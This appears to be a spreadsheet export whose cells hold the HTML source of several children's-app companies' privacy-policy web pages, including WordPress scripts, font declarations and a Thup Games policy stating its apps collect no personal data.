		url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-brands-400.svg#fontawesome") format("svg");
}
@font-face {
font-family: "FontAwesome";
font-display: block;
src: url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-solid-900.eot"),
		url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-solid-900.eot?#iefix") format("embedded-opentype"),
		url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-solid-900.woff2") format("woff2"),
		url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-solid-900.woff") format("woff"),
		url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-solid-900.ttf") format("truetype"),
		url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-solid-900.svg#fontawesome") format("svg");
}
@font-face {
font-family: "FontAwesome";
font-display: block;
src: url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-regular-400.eot"),
		url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-regular-400.eot?#iefix") format("embedded-opentype"),
		url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-regular-400.woff2") format("woff2"),
		url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-regular-400.woff") format("woff"),
		url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-regular-400.ttf") format("truetype"),
		url("https://use.fontawesome.com/releases/v5.15.3/webfonts/fa-regular-400.svg#fontawesome") format("svg");
unicode-range: U+F004-F005,U+F007,U+F017,U+F022,U+F024,U+F02E,U+F03E,U+F044,U+F057-F059,U+F06E,U+F070,U+F075,U+F07B-F07C,U+F080,U+F086,U+F089,U+F094,U+F09D,U+F0A0,U+F0A4-F0A7,U+F0C5,U+F0C7-F0C8,U+F0E0,U+F0EB,U+F0F3,U+F0F8,U+F0FE,U+F111,U+F118-F11A,U+F11C,U+F133,U+F144,U+F146,U+F14A,U+F14D-F14E,U+F150-F152,U+F15B-F15C,U+F164-F165,U+F185-F186,U+F191-F192,U+F1AD,U+F1C1-F1C9,U+F1CD,U+F1D8,U+F1E3,U+F1EA,U+F1F6,U+F1F9,U+F20A,U+F247-F249,U+F24D,U+F254-F25B,U+F25D,U+F267,U+F271-F274,U+F279,U+F28B,U+F28D,U+F2B5-F2B6,U+F2B9,U+F2BB,U+F2BD,U+F2C1-F2C2,U+F2D0,U+F2D2,U+F2DC,U+F2ED,U+F328,U+F358-F35B,U+F3A5,U+F3D1,U+F410,U+F4AD;
}
&lt;/style&gt;
&lt;script type='text/javascript' src='https://www.gominno.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.gominno.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='if-so-js-before'&gt;
    var nonce = "9c25bf5165";
    var ajaxurl = "https://www.gominno.com/wp-admin/admin-ajax.php";
    var ifso_page_url = "https://www.gominno.com/privacy/";
    var isAnalyticsOn = true;
    var isPageVisitedOn = 0;
    var isVisitCountEnabled = 1;
    var referrer_for_pageload = document.referrer;
&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.gominno.com/wp-content/plugins/if-so/public/js/if-so-public.js?ver=1.6' id='if-so-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.gominno.com/wp-content/plugins/wp-crawler-html/public/js/wp-crawler-html-public.js?ver=1.0.0' id='wp-crawler-html-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='advanced-ads-advanced-js-js-extra'&gt;
/* &lt;! [CDATA[ */
var advads_options = {"blog_id":"1","privacy":{"enabled":false,"state":"not_needed"}};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.gominno.com/wp-content/plugins/advanced-ads/public/assets/js/advanced.min.js?ver=1.40.1' id='advanced-ads-advanced-js-js'&gt;&lt;/script&gt;
&lt;!-- Google Analytics snippet added by Site Kit --&gt;
&lt;script type='text/javascript' src='https://www.googletagmanager.com/gtag/js?id=UA-153081665-4' id='google_gtagjs-js' async&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='google_gtagjs-js-after'&gt;
window.dataLayer = window.dataLayer ||</t>
  </si>
  <si>
    <t>[];function gtag(){dataLayer.push(arguments);}
gtag('set', 'linker', {"domains":["www.gominno.com"]} );
gtag("js", new Date());
gtag("set", "developer_id.dZTNiMT", true);
gtag("config", "UA-153081665-4", {"anonymize_ip":true});
gtag("config", "G-CZLENZGKD7");
&lt;/script&gt;
&lt;!-- End Google Analytics snippet added by Site Kit --&gt;
&lt;link rel="https://api.w.org/" href="https://www.gominno.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://www.gominno.com/wp-json/wp/v2/pages/413" /&gt;&lt;link rel='shortlink' href='https://www.gominno.com/?p=413' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://www.gominno.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.gominno.com%2Fprivacy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://www.gominno.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.gominno.com%2Fprivacy%2F&amp;#038;format=xml" /&gt;
				&lt;style type="text/css" id="cst_font_data"&gt;
					@font-face {font-family: "Sofia Pro Bold";font-display: auto;font-fallback: ;font-weight: 400;src: url(https://www.gominno.com/wp-content/uploads/2020/09/Sofia-Pro-Bold-Az.otf) format('OpenType');} @font-face {font-family: "Sofia Pro Regular";font-display: auto;font-fallback: ;font-weight: 400;src: url(https://www.gominno.com/wp-content/uploads/2020/09/Sofia-Pro-Regular-Az.otf) format('OpenType');} @font-face {font-family: "sofiapro-light";font-display: auto;font-fallback: ;font-weight: 400;src: url(https://www.gominno.com/wp-content/uploads/2020/09/sofiapro-light.otf) format('OpenType');} @font-face {font-family: "TideSans-300LilKahuna";font-display: auto;font-fallback: ;font-weight: 400;src: url(https://www.gominno.com/wp-content/uploads/2020/09/Tide-Sans-300-Lil-Kahuna.otf) format('OpenType');} @font-face {font-family: "TideSans-700Mondo";font-display: auto;font-fallback: ;font-weight: 400;src: url(https://www.gominno.com/wp-content/uploads/2020/09/TideSans-700Mondo.woff2) format('woff2'), url(https://www.gominno.com/wp-content/uploads/2020/09/Tide-Sans-700-Mondo.otf) format('OpenType');} @font-face {font-family: "TideSans300";font-display: auto;font-fallback: ;font-weight: 400;src: url(https://www.gominno.com/wp-content/uploads/2020/05/TideSans-300LilKahuna.woff2) format('woff2'), url(https://www.gominno.com/wp-content/uploads/2020/05/TideSans-300LilKahuna.woff) format('woff'), url(https://www.gominno.com/wp-content/uploads/2020/05/TideSans-300LilKahuna.ttf) format('TrueType'), url(https://www.gominno.com/wp-content/uploads/2020/05/TideSans-300LilKahuna.eot) format('eot');} @font-face {font-family: "TideSans700";font-display: auto;font-fallback: ;font-weight: 400;src: url(https://www.gominno.com/wp-content/uploads/2020/05/TideSans-700Mondo.woff2) format('woff2'), url(https://www.gominno.com/wp-content/uploads/2020/05/TideSans-700Mondo.woff) format('woff'), url(https://www.gominno.com/wp-content/uploads/2020/05/TideSans-700Mondo.ttf) format('TrueType'), url(https://www.gominno.com/wp-content/uploads/2020/05/TideSans-700Mondo.eot) format('eot');} @font-face {font-family: "Urbane Rounded Bold";font-display: auto;font-fallback: ;font-weight: 400;src: url(https://www.gominno.com/wp-content/uploads/2020/09/Urbane-Rounded-Bold.otf) format('OpenType');} @font-face {font-family: "Urbane Rounded Medium";font-display: auto;font-fallback: ;font-weight: 400;src: url(https://www.gominno.com/w</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
	&lt;!-- Document Settings --&gt;
    &lt;meta charset="UTF-8"&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;&lt;link media="all" href="https://monkeypreschool.com/wp-content/cache/autoptimize/css/autoptimize_cebd198fbc75e8cadc3c40a43e05041d.css" rel="stylesheet"&gt;&lt;title&gt;Privacy Policy &amp;#8211; Monkey Preschool&lt;/title&gt;
&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;link rel='dns-prefetch' href='//maps.googleapis.com' /&gt;
&lt;link rel='dns-prefetch' href='//use.fontawesome.com' /&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Monkey Preschool &amp;raquo; Feed" href="https://monkeypreschool.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Monkey Preschool &amp;raquo; Comments Feed" href="https://monkeypreschool.com/comments/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Monkey Preschool &amp;raquo; Privacy Policy Comments Feed" href="https://monkeypreschool.com/privacy-policy/feed/" /&gt;
&lt;script type="text/javascript"&gt;
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/monkeypreschool.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};
/*!</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</si>
  <si>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&lt;link rel='stylesheet' id='dendrite-fonts-css' href='//fonts.googleapis.com/css?family=Hind%3A300%2C400%2C500%2C600%7CPoppins%3A300%2C400%2C500%2C600%2C700&amp;#038;ver=1.1.2' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='https://monkeypreschool.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://maps.googleapis.com/maps/api/js?key&amp;#038;ver=1.1.2' id='google-maps-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://monkeypreschool.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://monkeypreschool.com/wp-json/wp/v2/pages/3" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://monkeypreschool.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://monkeypreschool.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 6.1.1" /&gt;
&lt;link rel="canonical" href="https://monkeypreschool.com/privacy-policy/" /&gt;
&lt;link rel='shortlink' href='https://monkeypreschool.com/?p=3' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://monkeypreschool.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmonkeypreschool.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://monkeypreschool.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fmonkeypreschool.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;link rel='shortcut icon' href= /&gt;&lt;meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress.</t>
  </si>
  <si>
    <t>"/&gt;
&lt;meta name="generator" content="Powered by Slider Revolution 6.2.14 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /&gt;
&lt;script type="text/javascript"&gt;function setREVStartSize(e){_x005F_x000D_
			 //window.requestAnimationFrame(function() {				 _x005F_x000D_
				window.</t>
  </si>
  <si>
    <t>RSIW = window.RSIW===undefined ? window.innerWidth : window. RSIW;	_x005F_x000D_
				window.</t>
  </si>
  <si>
    <t>RSIH;	_x005F_x000D_
				try {								_x005F_x000D_
					var pw = document.getElementById(e.c).parentNode.offsetWidth,_x005F_x000D_
						newh;_x005F_x000D_
					pw = pw===0 || isNaN(pw) ? window.</t>
  </si>
  <si>
    <t>RSIW : pw;_x005F_x000D_
					e.tabw = e.tabw===undefined ? 0 : parseInt(e.tabw);_x005F_x000D_
					e.thumbw = e.thumbw===undefined ? 0 :</t>
  </si>
  <si>
    <t>parseInt(e.thumbw);_x005F_x000D_
					e.tabh = e.tabh===undefined ? 0 : parseInt(e.tabh);_x005F_x000D_
					e.thumbh = e.thumbh===undefined ? 0 : parseInt(e.thumbh);_x005F_x000D_
					e.tabhide = e.tabhide===undefined ?</t>
  </si>
  <si>
    <t>0 : parseInt(e.tabhide);_x005F_x000D_
					e.thumbhide = e.thumbhide===undefined ? 0 : parseInt(e.thumbhide);_x005F_x000D_
					e.mh = e.mh===undefined || e.mh=="" || e.mh==="auto" ? 0 : parseInt(e.mh,0);		_x005F_x000D_
					if(e.layout==="fullscreen" || e.l==="fullscreen") 						_</t>
  </si>
  <si>
    <t>x000D_
						newh = Math.max(e.mh,window. RSIH) ;					_x005F_x000D_
					else{					_x005F_x000D_
						e.gw = Array.isArray(e.gw) ?</t>
  </si>
  <si>
    <t>e.gw : [e.gw];_x005F_x000D_
						for (var i in e.rl) if (e.gw[i]===undefined || e.gw[i]===0) e.gw[i] = e.gw[i-1];					_x005F_x000D_
						e.gh = e.el===undefined || e.el==="" || (Array.isArray(e.el) &amp;&amp; e.el.length==0)? e.gh : e.el;_x005F_x000D_
						e.gh = Array.isArray(e.gh) ? e.gh :</t>
  </si>
  <si>
    <t>[e.gh];_x005F_x000D_
						for (var i in e.rl) if (e.gh[i]===undefined || e.gh[i]===0) e.gh[i] = e.gh[i-1];_x005F_x000D_
											_x005F_x000D_
						var nl = new Array(e.rl.length),_x005F_x000D_
							ix = 0,						_x005F_x000D_
							sl;					_x005F_x000D_
						 e.tabw = e.tabhide&gt;=pw ? 0</t>
  </si>
  <si>
    <t>: e.tabw;_x005F_x000D_
						e.thumbw = e.thumbhide&gt;=pw ? 0 : e.thumbw;_x005F_x000D_
						e.tabh = e.tabhide&gt;=pw ? 0</t>
  </si>
  <si>
    <t>: e.tabh;_x005F_x000D_
						e.thumbh = e.thumbhide&gt;=pw ? 0 : e.thumbh;					_x005F_x000D_
						for (var i in e.rl) nl[i] = e.rl[i]&lt;window.RSIW ? 0 : e.rl[i];_x005F_x000D_
						sl = nl[0];									_x005F_x000D_
						for (var i in nl) if (sl&gt;nl[i] &amp;&amp; nl[i]&gt;0) { sl = nl[i]; ix=i;}															_x005F_x000D_
						var m = pw&gt;(e.gw[ix]+e.tabw+e.thumbw) ?</t>
  </si>
  <si>
    <t xml:space="preserve">1 : (pw-(e.tabw+e.thumbw)) / (e.gw[ix]);					_x005F_x000D_
						newh =  (e.gh[ix] * m) + (e.tabh + e.thumbh);_x005F_x000D_
					}				_x005F_x000D_
					if(window.rs_init_css===undefined) window.rs_init_css = document.head.appendChild(document.createElement("style"));					_x005F_x000D_
					</t>
  </si>
  <si>
    <t>document.getElementById(e.c).height = newh+"px";_x005F_x000D_
					window.rs_init_css.innerHTML += "#"+e.c+"_wrapper { height: "+newh+"px }";				_x005F_x000D_
				} catch(e){_x005F_x000D_
					console.log("Failure at Presize of Slider:" + e)_x005F_x000D_
				}					   _x005F_x000D_
			//});_x005F_x000D_
		  };&lt;/script&gt;
&lt;noscript&gt;&lt;style&gt; .wpb_animate_when_almost_visible { opacity: 1; }&lt;/style&gt;&lt;/noscript&gt;&lt;/head&gt;
&lt;body class="privacy-policy page-template-default page page-id-3 wpb-js-composer js-comp-ver-6.2.0 vc_responsive"&gt;
    &lt;div class="wrapper"&gt;
                &lt;div class="mobile-menu-container mobile-header-height header-sticky dendrite-smooth-scroll"&gt;
                &lt;header class="mobile-menu light-header non-container"&gt;
                    &lt;div class="inner-mobile-menu"&gt;
    &lt;div class="full-width-section"&gt;
                &lt;div class="logo-img vertical-aligment"&gt;
            &lt;a href="https://monkeypreschool.com/" style="width:</t>
  </si>
  <si>
    <t xml:space="preserve">120px;height: 51.84668989547px;"&gt;
                &lt;img class='style-svg dark-logo' src='https://monkeypreschool.com/wp-content/uploads/2020/09/logo-1.png' alt=''&gt;&lt;img class='light-logo style-svg' src='https://monkeypreschool.com/wp-content/uploads/2020/09/logo-1.png' alt=''&gt;            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div class="vertical-aligment"&gt;
            	&lt;div class="hamburger"&gt;
		&lt;a&gt;&lt;div class="hamburger-inner"&gt;&lt;/div&gt;&lt;/a&gt;
	&lt;/div&gt;
		&lt;div class="filters-button"&gt;
			&lt;a data-scroll href="#portfolio"&gt;
				&lt;div class="filtersbutton-inner"&gt;&lt;/div&gt;
			&lt;/a&gt;
		&lt;/div&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="mobile-menu-wrapper scrollbar"&gt;
        &lt;div class="mobile-nav-holder"&gt;
            &lt;nav class="menu-menu-1-container"&gt;&lt;ul id="menu-menu-1" class="clickable-dropdown"&gt;&lt;li id="menu-item-737" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-737"&gt;&lt;a href="/#support"&gt;Support&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-743" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-743"&gt;&lt;a href="https://thup.com/"&gt;THUP GAMES&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-736" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy current-menu-item page_item page-item-3 current_page_item menu-item-736 active "&gt;&lt;a href="https://monkeypreschool.com/privacy-policy/" aria-current="page"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/nav&gt;        &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;
                &lt;/header&gt;
            &lt;/div&gt;
                &lt;div class="header-wrapper header-height header-sticky dendrite-smooth-scroll"&gt;
            &lt;header class="classic-header light-header non-container"&gt;
                &lt;div class="inner-header-wrapper"&gt;
                    &lt;div class="container"&gt;
                        &lt;div class="full-width-section"&gt;
                                                        &lt;div class="logo-img vertical-aligment"&gt;
                                &lt;a href="https://monkeypreschool.com/" style="width: 120px;height: 51.84668989547px"&gt;
                                    &lt;img class=dark-logo src=https://monkeypreschool.com/wp-content/uploads/2020/09/logo-1.png alt=&gt;&lt;img class=light-logo src=https://monkeypreschool.com/wp-content/uploads/2020/09/logo-1.png alt=&gt;                                &lt;/a&gt;
                            &lt;/div&gt;
                            &lt;div class="vertical-aligment"&gt;
                                &lt;div class="menu-container"&gt;
                                    		&lt;div class="filters-button"&gt;
			&lt;a data-scroll href="#portfolio"&gt;
				&lt;div class="filtersbutton-inner"&gt;&lt;/div&gt;
			&lt;/a&gt;
		&lt;/div&gt;
&lt;nav class="menu-menu-1-container"&gt;&lt;ul id="menu-menu-2" class="menu"&gt;&lt;li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-737"&gt;&lt;a href="/#support"&gt;Support&lt;/a&gt;&lt;/li&gt;
&lt;li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-743"&gt;&lt;a href="https://thup.com/"&gt;THUP GAMES&lt;/a&gt;&lt;/li&gt;
&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy current-menu-item page_item page-item-3 current_page_item menu-item-736 active "&gt;&lt;a href="https://monkeypreschool.com/privacy-policy/" aria-current="page"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/nav&gt;                                &lt;/div&gt;
                            &lt;/div&gt;
                        &lt;/div&gt;
                    &lt;/div&gt;
                &lt;/div&gt;
            &lt;/header&gt;
                    &lt;/div&gt;
&lt;div class="container"&gt;
    _x005F_x000D_
&lt;p&gt;&lt;strong&gt;PRIVACY POLICY: Apps&lt;/strong&gt;&lt;/p&gt;_x005F_x000D_
&lt;p&gt;We respect and value your privacy at Thup Games.  </t>
  </si>
  <si>
    <t>Our measures to protect privacy exceed those required by COPPA and app store policies.&lt;/p&gt;_x005F_x000D_
&lt;p&gt; In our apps we do not collect, store, or share any personal information, location data, or usage data. We use no third party analytics or data collection services.</t>
  </si>
  <si>
    <t>Player account data is stored locally on your device and in your private cloud backups, which we do not and can not access.&lt;/p&gt;_x005F_x000D_
&lt;p&gt; We do not have advertisements of any sort.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;Once the app is purchased (or subscribed to for Monkey Preschool Learning), we do not offer or promote any additional in app purchases. &lt;br</t>
  </si>
  <si>
    <t xml:space="preserve">/&gt;&lt;br /&gt;We only externally link in protected parent areas to our support web site or to our other apps.&lt;/p&gt;_x005F_x000D_
&lt;p&gt;If you have any questions about our privacy policy, please do not hesitate to contact us.&lt;/p&gt;_x005F_x000D_
	&lt;/div&gt;
&lt;div class="comments" id="comments"&gt;
        &lt;div class="comments-form"&gt;
        &lt;div class="container"&gt;
                    &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
        &lt;footer class="static-footer"&gt;
            &lt;div class="footer-widgets"&gt;
    &lt;div class="container"&gt;
        &lt;div class="row"&gt;
                        &lt;div class="col-sm-6 col-xs-12"&gt;
                &lt;div id="custom_html-2" class="widget_text widget widget_custom_html"&gt;&lt;div class="textwidget custom-html-widget"&gt;&lt;div class="text-white"&gt;_x005F_x000D_
&lt;div id="support" class="anchor"&gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;h1&gt;_x005F_x000D_
	Contact Us_x005F_x000D_
&lt;/h1&gt;_x005F_x000D_
&amp;nbsp_x005F_x000D_
&lt;a href="mailto:support@thup.com" class="contact-link" title="Contact Us"&gt;_x005F_x000D_
	&lt;i class="far fa-envelope"&gt;&lt;/i&gt;_x005F_x000D_
	&lt;h6&gt;support@thup.com&lt;/h6&gt;_x005F_x000D_
&lt;/a&gt;_x005F_x000D_
&lt;a href="https://thup.com" class="contact-link" title="THUP GAMES" target="_blank" rel="noopener"&gt;_x005F_x000D_
		THUP GAMES_x005F_x000D_
	&lt;/a&gt;_x005F_x000D_
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;            &lt;/div&gt;
            &lt;div class="col-sm-6 col-xs-12"&gt;
                            &lt;/div&gt;
                    &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;
                &lt;div class="copyright"&gt;
                    &lt;div class="container"&gt;
                        &lt;div class="row"&gt;
                                                            &lt;div class="col-sm-6 col-xs-12 align-left"&gt;
                                    &lt;p&gt;&lt;p&gt;© 2023 Copyright Thup Games, LLC. All rights reserved.&lt;/p&gt;
&lt;/p&gt;
                                &lt;/div&gt;
                                                    &lt;/div&gt;
                    &lt;/div&gt;
                &lt;/div&gt;
                    &lt;/footer&gt;
&lt;script type='text/javascript' id='mediaelement-core-js-before'&gt;
var mejsL10n = {"language":"en","strings":{"mejs.download-file":"Download File","mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed.</t>
  </si>
  <si>
    <t>Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen":"Fullscreen","mejs.play":"Play","mejs.pause":"Pause","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds. ","mejs.live-broadcast":"Live Broadcast","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.</t>
  </si>
  <si>
    <t>","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}};
&lt;/script&gt;
&lt;script type='text/javascript' id='mediaelement-js-extra'&gt;
/* &lt;! [CDATA[ */
var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"};
/* ]]&gt; */
&lt;/script&gt;
&lt;!--[if lt IE 9]&gt;
&lt;script type='text/javascript' src='https://monkeypreschool.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=6.1.1' id='wp-mediaelement-js'&gt;&lt;/script&gt;
&lt;!</t>
  </si>
  <si>
    <t xml:space="preserve">[endif]--&gt;
&lt;script type='text/javascript' src='https://use.fontawesome.com/releases/v5.14.0/js/all.js?ver=1.0.0' id='fa-js'&gt;&lt;/script&gt;
&lt;script defer src="https://monkeypreschool.com/wp-content/cache/autoptimize/js/autoptimize_06f55c8e9345106098242761897c00a5.js"&gt;&lt;/script&gt;&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html class="" lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"&gt;
&lt;head&gt;
	&lt;meta http-equiv="X-UA-Compatible" content="IE=edge" /&gt;
	&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"/&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1" /&gt;
	&lt;title&gt;Privacy Policy &amp;#8211; PlayDate Digital&lt;/title&gt;
&lt;link rel='dns-prefetch' href='//s.w.org' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="PlayDate Digital &amp;raquo; Feed" href="https://playdatedigital.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="PlayDate Digital &amp;raquo; Comments Feed" href="https://playdatedigital.com/comments/feed/" /&gt;
				&lt;link rel="alternate" type="application/rss+xml" title="PlayDate Digital &amp;raquo; Privacy Policy Comments Feed" href="https://playdatedigital.com/privacy-policy/feed/" /&gt;
		&lt;meta property="og:title" content="Privacy Policy"/&gt;
		&lt;meta property="og:type" content="article"/&gt;
		&lt;meta property="og:url" content="https://playdatedigital.com/privacy-policy/"/&gt;
		&lt;meta property="og:site_name" content="PlayDate Digital"/&gt;
		&lt;meta property="og:description" content="PlayDate Digital is committed to maintaining your privacy. This privacy policy has been created to provide you with information about how we collect and use information that you may provide through our Website for parents and Apps for children, and explains the circumstances under which we may disclose that information, as well as"/&gt;
									&lt;meta property="og:image" content="https://playdatedigital.com/wp-content/uploads/2022/07/PlayDateDigital.png"/&gt;
									&lt;script type="text/javascript"&gt;
			 window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/playdatedigital.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.22"}};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[55356,56826,55356,56819],[55356,56826,8203,55356,56819])?!1:!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([55358,56760,9792,65039],[55358,56760,8203,9792,65039])}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</si>
  <si>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 important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
&lt;link rel='stylesheet' id='layerslider-css'  href='https://playdatedigital.com/wp-content/plugins/LayerSlider/static/layerslider/css/layerslider.css?ver=6.5.5' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='contact-form-7-css'  href='https://playdatedigital.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.3' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='rs-plugin-settings-css'  href='https://playdatedigital.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.5.1' type='text/css' media='all' /&gt;
&lt;style id='rs-plugin-settings-inline-css' type='text/css'&gt;
#rs-demo-id {}
&lt;/style&gt;
&lt;link rel='stylesheet' id='avada-stylesheet-css'  href='https://playdatedigital.com/wp-content/themes/Avada/assets/css/style.min.css?ver=5.5.2' type='text/css' media='all' /&gt;
&lt;!--[if lte IE 9]&gt;
&lt;link rel='stylesheet' id='avada-IE-fontawesome-css'  href='https://playdatedigital.com/wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/font-awesome.min.css?ver=5.5.2' type='text/css' media='all' /&gt;
&lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;
&lt;!--[if IE]&gt;
&lt;link rel='stylesheet' id='avada-IE-css'  href='https://playdatedigital.com/wp-content/themes/Avada/assets/css/ie.min.css?ver=5.5.2' type='text/css' media='all' /&gt;
&lt;! [endif]--&gt;
